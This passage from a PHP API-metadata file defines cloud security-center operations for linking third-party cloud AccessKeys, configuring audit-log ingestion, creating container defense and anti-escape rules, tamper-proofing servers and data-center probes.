AccessKey ID of a primary account on Huawei Cloud.'."\n" .'* **Azure**: Enter the AccessKey ID of a primary account on Microsoft Azure.'."\n" .'* **AWS**: Enter the AccessKey ID of a primary account on AWS.'."\n" ."\n" .'2\\. If AkType is set to sub, specify this parameter based on the following description:'."\n" ."\n" .'* **Tencent**: Enter the AccessKey ID of a sub-account on Tencent Cloud.'."\n" .'* **HUAWEICLOUD**: Enter the AccessKey ID of a sub-account on Huawei Cloud.'."\n" .'* **Azure**: Enter the AccessKey ID of a sub-account on Microsoft Azure.'."\n" .'* **AWS**: Enter the AccessKey ID of a sub-account on AWS.'."\n", 'type' => 'string', 'required' => true, 'example' => '45GLRV4SOT0YFB****', 'title' => ''], ], [ 'name' => 'SecretKey', 'in' => 'query', 'schema' => ['description' => 'The AccessKey secret. Valid values:'."\n" ."\n" .'1\\. If AkType is set to primary, specify this parameter based on the following description:'."\n" ."\n" .'* **Tencent**: Enter the AccessKey secret of a primary account on Tencent Cloud.'."\n" .'* **HUAWEICLOUD**: Enter the AccessKey secret of a primary account on Huawei Cloud.'."\n" .'* **Azure**: Enter the AccessKey secret of a primary account on Microsoft Azure.'."\n" .'* **AWS**: Enter the AccessKey secret of a primary account on AWS.'."\n" ."\n" .'2\\. If AkType is set to sub, specify this parameter based on the following description:'."\n" ."\n" .'* **Tencent**: Enter the AccessKey secret of a sub-account on Tencent Cloud.'."\n" .'* **HUAWEICLOUD**: Enter the AccessKey secret of a sub-account on Huawei Cloud.'."\n" .'* **Azure**: Enter the AccessKey secret of a sub-account on Microsoft Azure.'."\n" .'* **AWS**: Enter the AccessKey secret of a sub-account on AWS.'."\n", 'type' => 'string', 'required' => true, 'example' => 'AE6SLd****', 'title' => ''], ], [ 'name' => 'Regions', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The regions that are examined during AccessKey pair authentication. This parameter takes effect only when Vendor is set to AWS.'."\n" ."\n" .'> You can call the [ListCloudVendorRegions](~~ListCloudVendorRegions~~) operation to query regions.'."\n", 'type' => 'array', 'items' => ['description' => 'The region that is examined during AccessKey pair authentication.'."\n", 'type' => 'string', 'required' => false, 'example' => 'ap-south-1', 'title' => ''], 'required' => false, 'maxItems' => 10, 'title' => '', 'example' => '', ], ], [ 'name' => 'SubscriptionIds', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The subscription IDs. This parameter takes effect only when Vendor is set to Azure.'."\n", 'type' => 'array', 'items' => ['description' => 'The subscription ID.'."\n", 'type' => 'string', 'required' => false, 'example' => '9b41e7ae-fcbf-4983-aa32-6fb2e*****', 'title' => ''], 'required' => false, 'maxItems' => 1, 'title' => '', 'example' => '', ], ], [ 'name' => 'TenantId', 'in' => 'query', 'schema' => ['description' => 'The tenant ID. This parameter takes effect only when Vendor is set to Azure.'."\n", 'type' => 'string', 'required' => false, 'example' => '95304a97-339b-4de5-9a7d-cdbffaf****', 'title' => ''], ], [ 'name' => 'Domain', 'in' => 'query', 'schema' => ['description' => 'The Active Directory (AD) domain. This parameter takes effect only when Vendor is set to Azure. Valid values:'."\n" ."\n" .'* **china**'."\n" .'* **global**'."\n", 'type' => 'string', 'required' => false, 'example' => 'global', 'title' => ''], ], [ 'name' => 'AuthModules', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The modules that are associated with the AccessKey pair.'."\n", 'type' => 'array', 'items' => ['description' => 'The code of the module. Valid values:'."\n" ."\n" .'* **HOST**: host'."\n" .'* **CSPM**: configuration assessment'."\n" .'* **SIEM**: CloudSiem'."\n" .'* **TRIAL**: log audit'."\n", 'type' => 'string', 'required' => false, 'example' => 'HOST', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content in the request and response messages. Default value: **zh**. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'VendorAuthAlias', 'in' => 'query', 'allowEmptyValue' => true, 'schema' => ['description' => 'The name of the AccessKey pair.'."\n" ."\n" .'> The account information of the third-party cloud servers.'."\n", 'type' => 'string', 'required' => false, 'example' => 'test', 'title' => ''], ], [ 'name' => 'ExtendInfo', 'in' => 'query', 'schema' => ['description' => 'Extended information.'."\n" .'> Used to record extended information from different vendors. > For Google Cloud, which is accessed via a service account, ExtendInfo stores the service key file in JSON format, excluding the private_key_id and zprivate_key fields. The file includes the following fields: type, project_id, client_email, client_id, auth_uri, token_uri, auth_provider_x509_cert_url, client_x509_cert_url, universe_domain.', 'type' => 'string', 'required' => false, 'example' => '{\\"product\\":\\"webFirewall\\",\\"remark\\":\\"remark\\"}', 'title' => ''], ], [ 'name' => 'CtdrCloudUserId', 'in' => 'query', 'schema' => ['description' => 'Account ID. > The account ID of the cloud provider, required when permissions include threat analysis and response.', 'type' => 'string', 'required' => false, 'example' => 'azure_demo_1', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => 'A60DA4EC-7CD8-577D-AD73-***', 'title' => ''], 'Data' => [ 'description' => 'The information about the AccessKey pair that is added.'."\n", 'type' => 'object', 'properties' => [ 'Status' => ['description' => 'The status of the AccessKey pair. Valid values:'."\n" ."\n" .'* **0**: enabled'."\n" .'* **1**: disabled'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'AuthId' => ['description' => 'The unique ID of the AccessKey pair.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '2158', 'title' => ''], 'AkType' => ['description' => 'The type of the account to which the AccessKey pair belongs. Valid values:'."\n" ."\n" .'* **primary**: a primary account'."\n" .'* **sub**: a sub-account'."\n", 'type' => 'string', 'example' => 'sub', 'title' => ''], 'SecretId' => ['description' => 'The AccessKey ID.'."\n", 'type' => 'string', 'example' => 'AE6SLd****', 'title' => ''], 'ServiceStatus' => ['description' => 'The service status of the AccessKey pair. Valid values:'."\n" ."\n" .'* **0**: being used'."\n" .'* **1**: exception occurred'."\n" .'* **2**: being validated'."\n" .'* **3**: validation timed out'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'Vendor' => ['description' => 'The cloud service provider. Valid values:'."\n" ."\n" .'* **Tencent**: Tencent Cloud'."\n" .'* **HUAWEICLOUD**: Huawei Cloud'."\n" .'* **Azure**: Microsoft Azure'."\n" .'* **AWS**: AWS'."\n", 'type' => 'string', 'example' => 'Tencent', 'title' => ''], 'Message' => ['description' => 'The error message of the AccessKey pair.'."\n", 'type' => 'string', 'example' => 'The IAM user is forbidden in the currently selected region', 'title' => ''], 'AuthModules' => [ 'description' => 'The modules that are associated with the AccessKey pair.'."\n", 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'ModuleDisp' => ['description' => 'The display name of the module.'."\n", 'type' => 'string', 'example' => 'Host Assets', 'title' => ''], 'ModuleStatement' => ['description' => 'The permission description of the module.'."\n", 'type' => 'string', 'example' => 'Read permission of the cloud server or virtual machine', 'title' => ''], 'Module' => ['description' => 'The code of the module. Valid values:'."\n" ."\n" .'* **HOST**: host'."\n" .'* **CSPM**: configuration assessment'."\n" .'* **SIEM**: CloudSiem'."\n" .'* **TRIAL**: log audit'."\n", 'type' => 'string', 'example' => 'HOST', 'title' => ''], 'ModuleAssetType' => ['description' => 'The cloud asset that is associated with the module.'."\n", 'type' => 'string', 'example' => 'Cloud server or virtual machine', 'title' => ''], 'ModuleServiceStatus' => ['description' => 'The service status of the module. Valid values:'."\n" ."\n" .'* **0**: being used'."\n" .'* **1**: exception occurred'."\n" .'* **2**: being validated'."\n" .'* **3**: validation timed out'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'Message' => ['description' => 'The error message of the module.'."\n", 'type' => 'string', 'example' => 'ak_domain_error', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'VendorAuthAlias' => ['description' => 'The name of the AccessKey pair.'."\n" ."\n" .'> The account information of the third-party cloud servers.'."\n", 'type' => 'string', 'example' => 'test', 'title' => ''], 'CtdrCloudUserId' => ['description' => 'Account ID. '."\n" ."\n" .'> The account ID of the cloud provider being integrated.', 'type' => 'string', 'example' => 'azure_demo_1', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'CreateAkError', 'errorMessage' => 'Failed to create an AK.', 'description' => 'Failed to create an AK.'], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'AddCloudVendorAccountAK', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'AddCloudVendorAccountAK'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:AddCloudVendorAccountAK', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"A60DA4EC-7CD8-577D-AD73-***\\",\\n \\"Data\\": {\\n \\"Status\\": 0,\\n \\"AuthId\\": 2158,\\n \\"AkType\\": \\"sub\\",\\n \\"SecretId\\": \\"AE6SLd****\\",\\n \\"ServiceStatus\\": 0,\\n \\"Vendor\\": \\"Tencent\\",\\n \\"Message\\": \\"The IAM user is forbidden in the currently selected region\\",\\n \\"AuthModules\\": [\\n {\\n \\"ModuleDisp\\": \\"Host Assets\\",\\n \\"ModuleStatement\\": \\"Read permission of the cloud server or virtual machine\\",\\n \\"Module\\": \\"HOST\\",\\n \\"ModuleAssetType\\": \\"Cloud server or virtual machine\\",\\n \\"ModuleServiceStatus\\": 0,\\n \\"Message\\": \\"ak_domain_error\\"\\n }\\n ],\\n \\"VendorAuthAlias\\": \\"test\\",\\n \\"CtdrCloudUserId\\": \\"azure_demo_1\\"\\n }\\n}","type":"json"}]', ], 'AddCloudVendorTrialConfig' => [ 'summary' => 'Adds configurations of connecting the audit logs of a third-party cloud asset.', 'methods' => ['post'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'create', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas8WIQPJ'], ], 'parameters' => [ [ 'name' => 'AuthId', 'in' => 'query', 'schema' => ['description' => 'The AccessKey ID.'."\n" ."\n" .'> [](#-describecloudvendoraccountaklist--authid)You can call the [DescribeCloudVendorAccountAKList](~~DescribeCloudVendorAccountAKList~~) operation to query the AccessKey ID.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '2363', 'title' => ''], ], [ 'name' => 'Vendor', 'in' => 'query', 'schema' => ['description' => 'The service provider of the cloud asset. Valid values:'."\n" ."\n" .'* **Tencent**: Tencent Cloud.'."\n" .'* **AWS**: Amazon Web Services (AWS).'."\n", 'type' => 'string', 'required' => true, 'example' => 'Tencent', 'title' => ''], ], [ 'name' => 'AuthInfo', 'in' => 'query', 'schema' => ['description' => 'The configurations of the third-party cloud asset. Valid values:'."\n" ."\n" .'* *AWS*: Configure the sqsQueueName and sqsRegion parameters.'."\n" .'* *Tencent*: Configure the kafkaUserName, kafkaBootstrapServers, and kafkaTopic parameters.'."\n", 'type' => 'string', 'required' => true, 'example' => '{\\"sqsRegion\\":\\"us-west-2\\",\\"sqsQueueName\\":\\"****\\"}', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => 'Schema of Response', 'description' => 'The data returned.'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => 'Id of the request', 'description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '7BC55C8F-226E-5AF5-9A2C-2EC43864****'], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"7BC55C8F-226E-5AF5-9A2C-2EC43864****\\"\\n}","type":"json"}]', 'title' => 'AddCloudVendorTrialConfig', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'AddCloudVendorTrialConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:addCloudVendorTrialConfig', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'translator' => 'machine', ], 'AddContainerDefenseRule' => [ 'summary' => 'Creates a rule for non-image program defense.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'create', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasA217JR'], ], 'parameters' => [ [ 'name' => 'RuleId', 'in' => 'query', 'schema' => ['title' => 'id', 'description' => 'The ID of the rule. You do not need to manually specify the ID.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '500018'], ], [ 'name' => 'RuleAction', 'in' => 'query', 'schema' => [ 'title' => '', 'description' => 'The action that is performed when the rule is hit. Valid values:'."\n" ."\n" .'* **1**: alert'."\n" .'* **2**: block'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'enumValueTitles' => [1 => '', ''], 'example' => '1', ], ], [ 'name' => 'RuleSwitch', 'in' => 'query', 'schema' => [ 'title' => '', 'description' => 'The switch of the rule. Valid values:'."\n" ."\n" .'* **0**: off'."\n" .'* **1**: on'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'enumValueTitles' => ['', ''], 'example' => '1', ], ], [ 'name' => 'RuleName', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The name of the rule.'."\n", 'type' => 'string', 'required' => false, 'example' => 'auto-test-rule-lt9umq'], ], [ 'name' => 'Description', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The description of the rule.'."\n", 'type' => 'string', 'required' => false, 'example' => 'test-proc-defense'], ], [ 'name' => 'RuleType', 'in' => 'query', 'schema' => ['description' => 'The rule type. Valid values:'."\n" ."\n" .'* 2: user-defined rules'."\n" ."\n" .'> Only the value 2 is supported.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '2', 'title' => ''], ], [ 'name' => 'Whitelist', 'in' => 'query', 'style' => 'json', 'schema' => [ 'title' => '', 'description' => 'The whitelist.'."\n", 'type' => 'object', 'properties' => [ 'Hash' => [ 'description' => 'The hash values of the files that need to be added to the whitelist.'."\n" ."\n" .'> This parameter is not supported.'."\n", 'type' => 'array', 'items' => ['description' => 'The hash value of the file that needs to be added to the whitelist.'."\n", 'type' => 'string', 'deprecated' => true, 'required' => false, 'example' => 'hashcode', 'title' => ''], 'deprecated' => true, 'required' => false, 'title' => '', 'example' => '', ], 'Path' => [ 'description' => 'The paths to the files that need to be added to the whitelist.'."\n", 'type' => 'array', 'items' => ['description' => 'The path to the file that needs to be added to the whitelist.'."\n", 'type' => 'string', 'required' => false, 'example' => '/test/worker.sh', 'title' => ''], 'required' => false, 'title' => '', 'example' => '', ], 'Image' => [ 'description' => 'The images that need to be added to the whitelist.'."\n", 'type' => 'array', 'items' => ['description' => 'The image that needs to be added to the whitelist.'."\n", 'type' => 'string', 'required' => false, 'example' => 'repo:tag', 'title' => ''], 'required' => false, 'title' => '', 'example' => '', ], ], 'required' => false, 'example' => '', ], ], [ 'name' => 'Scope', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'title' => '', 'description' => 'The scope.'."\n", 'type' => 'array', 'items' => [ 'description' => '', 'type' => 'object', 'properties' => [ 'ClusterId' => ['description' => 'The ID of the cluster.'."\n" ."\n" .'> You can call the [DescribeGroupedContainerInstances](~~182997~~) operation to query the IDs of clusters.'."\n", 'type' => 'string', 'required' => false, 'example' => '8e2***75b', 'title' => ''], 'AllNamespace' => [ 'description' => 'Specifies whether to include all namespaces. Valid values:'."\n" ."\n" .'* **0**: You can use the Namespaces parameter to specify the namespaces to include.'."\n" .'* **1**: All namespaces are included.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'enumValueTitles' => ['', ''], 'example' => '0', 'title' => '', ], 'Namespaces' => [ 'description' => 'The namespaces to include.'."\n", 'type' => 'array', 'items' => ['description' => 'The namespace to include.'."\n", 'type' => 'string', 'required' => false, 'example' => 'default', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], 'required' => false, 'title' => '', 'example' => '', ], 'required' => false, 'maxItems' => 100, 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => 'PlainResult', 'description' => 'PlainResult'."\n", 'type' => 'object', 'properties' => [ 'Data' => ['description' => 'The ID of the rule that is created.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '182', 'title' => ''], 'Success' => [ 'description' => 'Indicates whether the request was successful. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**'."\n", 'type' => 'boolean', 'enumValueTitles' => ['true' => '', 'false' => ''], 'example' => 'true', 'title' => '', ], 'Code' => ['description' => 'The response code. The status code **200** indicates that the request was successful. Other status codes indicate that the request failed. You can identify the cause of the failure based on the status code.'."\n", 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The returned message.'."\n", 'type' => 'string', 'example' => 'There was an error with your request.', 'title' => ''], 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '8C376***AE74FB4', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code that is returned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": 182,\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"There was an error with your request.\\",\\n \\"RequestId\\": \\"8C376***AE74FB4\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', 'title' => 'AddContainerDefenseRule', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'AddContainerDefenseRule'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:AddContainerDefenseRule', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'ContainerDefenseRule', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:containerdefenserule/*'], ], ], ], ], ], 'AddContainerPluginRule' => [ 'summary' => 'Creates a defense rule against container escapes.', 'methods' => ['get', 'post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'create', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '152413', 'abilityTreeNodes' => ['FEATUREsasZLVTBH'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'RuleName', 'in' => 'query', 'schema' => ['description' => 'The name of the rule. The name must be 1 to 80 characters in length, and can contain letters, digits, hyphens (-), forward slashes (/), periods (.), and underscores (\\_). The names of rules that are created for the same user must be unique.'."\n", 'type' => 'string', 'required' => true, 'example' => 'tyest111', 'title' => ''], ], [ 'name' => 'RuleTemplateId', 'in' => 'query', 'schema' => ['description' => 'The ID of the rule template. You can call the ListSystemClientRules operation to query the ID of the rule template.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '86863', 'title' => ''], ], [ 'name' => 'Mode', 'in' => 'query', 'schema' => ['description' => 'The action that you want to specify for the rule. Valid values:'."\n" ."\n" .'* **1**: triggers alerts.'."\n" .'* **2**: blocks escapes.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '1', 'title' => ''], ], [ 'name' => 'SelectedPolicy', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The check items that are enabled for the rule.'."\n", 'type' => 'array', 'items' => ['description' => 'The check item that is enabled for the rule.'."\n", 'type' => 'string', 'required' => false, 'example' => 'system_triggered_task', 'title' => ''], 'required' => true, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'RuleType', 'in' => 'query', 'schema' => ['description' => 'The type of the rule. Valid values:'."\n" ."\n" .'* **0**: custom rule'."\n" .'* **1**: system rule'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '0', 'default' => '0', 'title' => ''], ], [ 'name' => 'WhiteImages', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The images that are added to the whitelist.'."\n", 'type' => 'array', 'items' => ['description' => 'The image that is added to the whitelist.'."\n", 'type' => 'string', 'required' => false, 'example' => 'centos', 'title' => ''], 'required' => false, 'maxItems' => 100, 'minItems' => 1, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The data returned.'."\n", 'type' => 'object', 'properties' => [ 'RuleId' => ['description' => 'The ID of the rule.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '219', 'title' => ''], 'RuleName' => ['description' => 'The name of the rule.'."\n", 'type' => 'string', 'example' => 'test2', 'title' => ''], 'SwitchId' => ['description' => 'The ID of the switch.'."\n", 'type' => 'string', 'example' => 'USER-CONTAINER-RULE-SWITCH-TYPE_xxxx', 'title' => ''], ], 'title' => '', 'example' => '', ], 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '24A20733-10A0-4AF6-BE6B-E3322413BB68', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": {\\n \\"RuleId\\": 219,\\n \\"RuleName\\": \\"test2\\",\\n \\"SwitchId\\": \\"USER-CONTAINER-RULE-SWITCH-TYPE_xxxx\\"\\n },\\n \\"RequestId\\": \\"24A20733-10A0-4AF6-BE6B-E3322413BB68\\"\\n}","type":"json"}]', 'title' => 'AddContainerPluginRule', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'AddContainerPluginRule'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:AddContainerPluginRule', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'AddFileProtectBindMachine' => [ 'methods' => ['post'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'none', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas4GT4R7'], ], 'parameters' => [ [ 'name' => 'BlockUuids', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of servers for which tamper-proofing is enabled.', 'type' => 'array', 'items' => ['description' => 'The UUID of the tamper-proofing server.', 'type' => 'string', 'required' => false, 'example' => '6fa24967-xxxx-xxxx-xxxx-xxxxxxxxxxxx', 'title' => ''], 'required' => false, 'maxItems' => 100, 'minItems' => 1, 'title' => '', 'example' => '', ], ], [ 'name' => 'AlertUuids', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of servers for which the alert protection level is enabled.', 'type' => 'array', 'items' => ['description' => 'The UUID of the alert server.', 'type' => 'string', 'required' => false, 'example' => '6fa24967-xxxx-xxxx-xxxx-xxxxxxxxxxxx', 'title' => ''], 'required' => false, 'maxItems' => 100, 'minItems' => 1, 'title' => '', 'example' => '', ], ], [ 'name' => 'NoneUuids', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of servers for which file protection is disabled.', 'type' => 'array', 'items' => ['description' => 'The UUID of the server for which file protection is disabled.', 'type' => 'string', 'required' => false, 'example' => '6fa24967-xxxx-xxxx-xxxx-xxxxxxxxxxxx', 'title' => ''], 'required' => false, 'maxItems' => 100, 'minItems' => 1, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'Schema of Response', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'Id of the request', 'type' => 'string', 'example' => '6673D49C-A9AB-40DD-B4A2-B92306701AE7'], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IllegalParameter', 'errorMessage' => 'Illegal parameter, please check the param.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Add tamper-proofing server', 'summary' => 'Creates a file protection rule.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:AddFileProtectBindMachine', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"6673D49C-A9AB-40DD-B4A2-B92306701AE7\\"\\n}","type":"json"}]', ], 'AddIdcProbe' => [ 'summary' => 'Creates an IDC probe to add assets in a data center to Security Center and manage the assets by using the Security Center console.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'create', 'abilityTreeCode' => '91899', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'IdcName', 'in' => 'query', 'schema' => ['description' => 'The name of the data center.'."\n", 'type' => 'string', 'required' => true, 'example' => 'test', 'title' => ''], ], [ 'name' => 'IpSegments', 'in' => 'query', 'schema' => ['description' => 'The settings of the CIDR block.'."\n", 'type' => 'string', 'required' => true, 'example' => '192.168.XX.XX/24', 'title' => ''], ], [ 'name' => 'WinPort', 'in' => 'query', 'schema' => ['description' => 'The Windows port.'."\n", 'type' => 'string', 'required' => true, 'example' => '40', 'title' => ''], ], [ 'name' => 'LinuxPort', 'in' => 'query', 'schema' => ['description' => 'The Linux port.'."\n", 'type' => 'string', 'required' => true, 'example' => '40', 'title' => ''], ], [ 'name' => 'IdcRegion', 'in' => 'query', 'schema' => ['description' => 'The region ID.'."\n", 'type' => 'string', 'required' => true, 'example' => 'Hangzhou', 'title' => ''], ], [ 'name' => 'PeriodUnit', 'in' => 'query', 'schema' => ['description' => 'The unit of the scan interval. Valid values:'."\n" ."\n" .'* **day**'."\n" .'* **hour**'."\n", 'type' => 'string', 'required' => true, 'example' => 'day', 'title' => ''], ], [ 'name' => 'IntervalPeriod', 'in' => 'query', 'schema' => ['description' => 'The scan interval.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '1', 'title' => ''], ], [ 'name' => 'Uuids', 'in' => 'query', 'schema' => ['description' => 'The UUID of the server. Separate multiple UUIDs with commas (,).'."\n" ."\n" .'> You can call the [DescribeCloudCenterInstances](~~DescribeCloudCenterInstances~~) operation to query the UUID.'."\n", 'type' => 'string', 'required' => true, 'example' => '076a446d-df7d-424c-bdc5-bb5dc7f1****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The response parameters.'."\n", 'type' => 'object', 'properties' => [ 'Count' => ['description' => 'The total number of entries returned.'."\n", 'type' => 